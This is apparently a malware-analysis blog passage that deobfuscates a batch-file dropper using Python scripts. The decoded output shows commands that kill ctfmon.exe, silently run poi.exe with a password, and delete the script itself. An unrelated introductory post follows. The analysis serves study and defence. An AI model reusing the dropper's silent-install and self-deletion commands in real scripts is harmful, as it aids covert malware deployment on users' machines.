%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%0%vmQRH%>%vmQRH%%zMUmhfp%%nKFutdce%%WbawMPRLx%
:1
%uDysBInSP%%AhgUCQdNc%%YDOQcd%%VKdC%%vmQRH%

It is a pretty ugly one, but it is very easy to analyze. Variable uFxIfBjU is “set”, therefore %uFxIfBjU% vmQRH= sets an empty value to vmQRH; based on my understanding it looks like a space (see below). Finally, the command %uFxIfBjU%%vmQRH%WlvwJ== is something like “set WlvwJ='='”. So let's clean up the batch file a little bit based on the above.


set uFxIfBjU=set
set vmQRH=
set WlvwJ==
set niGHQ=]
set gvNJihit=M
set ubLLkCr=L
set wYYyQIxk=z
set WbawMPRLx=l
set XwaRdC=;
set SMfIu=$
set JekiXWpq=@
set mtoldyH=9
set QffPfCDl=_
set smzXUe=(
set gJCt=a
set CtvQzOlc=D
set tKApd=I
set GFNL=S
set TaMgC=F
set eYdGvjqA=r
set kAJtQCe=1
set CbrzJAoLY=?
set MfcJVJhRo=c
set KppMzH=#
set CbeOdG=T
set wkUfYM=y
set qCCY=C
set IeqoAr=b
set zMUmhfp=n
set VgoKTyH=2
set IAiBMhM=O
set AaWV=:
set lCRh=N
set VzRqFhIQ=k
set UKYKKJt=K
set NnRB=3
set INirbsqG=)
set wiPSW=m
set qFclxaIHP=.
set GhcPmRW=*
set wJnFYm=5
set zMgQwFM=Y
set jCwDE=q
set gPgacqpE=!
set nKFutdce=u
set GhGCV=U
set VKdC=t
set eEgBdYwt=8
set xjXo=B
set Tpcr=H
set uDysBInSP=E
set flSTw=g
set vOjmHX=P
set cJDeAFxaa=v
set IDRnURC=e
set rvKdv=w
set YAXUzT=R
set tRuE=6
set nhRt=0
set VVoOFw=o
set iHXWWADYK=X
set ryFCAi=A
set rUFWQUVKk=h
set YDOQcd=i
set FvSVze=s
set oAbh=/
set tlGA=+
set AhgUCQdNc=x
set hbveWdig=G
set sRQuCQHsB=j
set jFbR=[
set lITdx=d
set VkONb=7
set DcNlaOG={
set Dkyl=V
set gxmBTj=Q
set bJiooe="
set udasU=\
set UkAijhn=4
set DfIJfWaO=W
set uHNRtTBo=-
set sRaTV=p
set sdbGC=f
set fVqiK=,
set mLjd=}
set SAXwnTEq=Z
set XyTlyKEg=J

It looks much better, right? So we have one more step: to decode the batch file. I am very lazy, so I wrote a small Python script that replaces the variables using the list of “set” commands in the batch file.

replaceArray = {}

with open('battemp.txt', 'r') as f:
    while True:
        line = f.readline()
        # when there are no more "set" instructions stop looping
        if not line.startswith("set "):
            break
        # tokenize "set XX=YYY": split on the first "=" only, so that a value
        # that is itself "=" (WlvwJ) or a single space (vmQRH) survives
        name, value = line[len("set "):].rstrip("\r\n").split("=", 1)
        # store the dictionary values
        replaceArray[name] = value
        print(name)

    # the line that ended the loop is the first payload line, keep it
    restOfFile = line + f.read()

for key in replaceArray:
    print("%" + key + "%")
    restOfFile = restOfFile.replace("%" + key + "%", replaceArray[key])

print(restOfFile)

Let us see the output

ping -n 2 google.com|Find /I "TTL="||goto next
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
taskkill /f /im ctfmon.exe
poi.exe /verysilent /Password=345465122345
ping localhost -10
del %0 > nul
goto 1
:next
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del poi.exe
del %0 > nul
:1
Exit
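As an added example that goes beyond the post's script (my own code, not the author's), the following Python decoder works on the raw obfuscated batch file without the manual cleanup step: it reproduces cmd.exe's single-pass, line-by-line %VAR% expansion and learns every set as it goes, so the alias for set (uFxIfBjU), the space value (vmQRH) and the “=” value (WlvwJ) are handled the same way the interpreter handles them. The embedded sample is a constructed excerpt using the variable names of the file above, including the trailing space after vmQRH= that the copy on this page lost.

```python
import re

# Added example: decode the set-variable obfuscation of 1.bat directly.
# %0..%9 are batch arguments, not variables, so the pattern requires a letter.
_VAR = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
_SET = re.compile(r"^\s*set\s(.*)$", re.IGNORECASE)


def expand(line: str, env: dict) -> str:
    """One pass of %VAR% expansion; undefined names expand to nothing, as in a batch file."""
    return _VAR.sub(lambda m: env.get(m.group(1), ""), line)


def deobfuscate_batch(text: str):
    """Return (env, decoded_lines). A line that reads 'set NAME=VALUE' after
    expansion updates env; every other line is emitted in expanded form."""
    env, out = {}, []
    for raw in text.splitlines():
        line = expand(raw, env)
        m = _SET.match(line)
        if m and "=" in m.group(1):
            name, value = m.group(1).split("=", 1)   # first "=" only: "WlvwJ==" -> "="
            env[name.strip()] = value                # value keeps trailing spaces (vmQRH)
        else:
            out.append(line)
    return env, out


# Constructed excerpt in the style of the file above (real names, short subset).
SAMPLE_BAT = "\r\n".join([
    "set uFxIfBjU=set",
    "%uFxIfBjU% vmQRH= ",                   # trailing space: vmQRH becomes " "
    "%uFxIfBjU%%vmQRH%WlvwJ==",              # WlvwJ becomes "="
    "%uFxIfBjU%%vmQRH%lITdx%WlvwJ%d",
    "%uFxIfBjU%%vmQRH%IDRnURC%WlvwJ%e",
    "%uFxIfBjU%%vmQRH%WbawMPRLx%WlvwJ%l",
    "%uFxIfBjU%%vmQRH%sRaTV%WlvwJ%p",
    "%uFxIfBjU%%vmQRH%VVoOFw%WlvwJ%o",
    "%uFxIfBjU%%vmQRH%YDOQcd%WlvwJ%i",
    "%uFxIfBjU%%vmQRH%qFclxaIHP%WlvwJ%.",
    "%uFxIfBjU%%vmQRH%AhgUCQdNc%WlvwJ%x",
    "%uFxIfBjU%%vmQRH%zMUmhfp%WlvwJ%n",
    "%uFxIfBjU%%vmQRH%nKFutdce%WlvwJ%u",
    "%uFxIfBjU%%vmQRH%uDysBInSP%WlvwJ%E",
    "%uFxIfBjU%%vmQRH%VKdC%WlvwJ%t",
    "%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%",
    "%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%0%vmQRH%>%vmQRH%%zMUmhfp%%nKFutdce%%WbawMPRLx%",
    ":1",
    "%uDysBInSP%%AhgUCQdNc%%YDOQcd%%VKdC%%vmQRH%",
])

if __name__ == "__main__":
    env, lines = deobfuscate_batch(SAMPLE_BAT)
    print("\n".join(lines))
```

If the trailing space after vmQRH= is missing in your copy, the third line expands to setWlvwJ== and ends up in the decoded output instead of the environment, which immediately tells you which value was lost. The decoder passes the real file through unchanged on purpose: labels such as :next and argument references such as %0 survive exactly as cmd.exe would see them.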


So that's all folks. In the next part of this post I will try to describe the functionality of poi.exe. Any comments are more than welcome.


Hello World


I have always been fascinated with malware. I have also developed a small number of them and it was something I really enjoyed. However, what I also really like is to analyze them and try to understand their internals. I started analyzing malware during various cyber security exercises organized by a variety of organizations, usually not public ones. During the last year I had the opportunity to do the same thing as a side project at my everyday job. Malware samples blocked by our security infrastructure are collected and stored, so I am lucky enough to have access to them. To be precise, this is a side project for me; therefore I don't consider myself a professional malware analyst but more of a researcher.

After this small introduction, let me describe the concept of the blog. I like to keep notes in order to be able to come back in case I forget something. Therefore this blog is a notebook which might be useful to others as well. It is also a great opportunity to share information with people more expert than me and maybe get useful comments.

Hopefully I will be able to post new things frequently, although I am not sure whether the scope of this blog will include only malware analysis; in any case… Hello World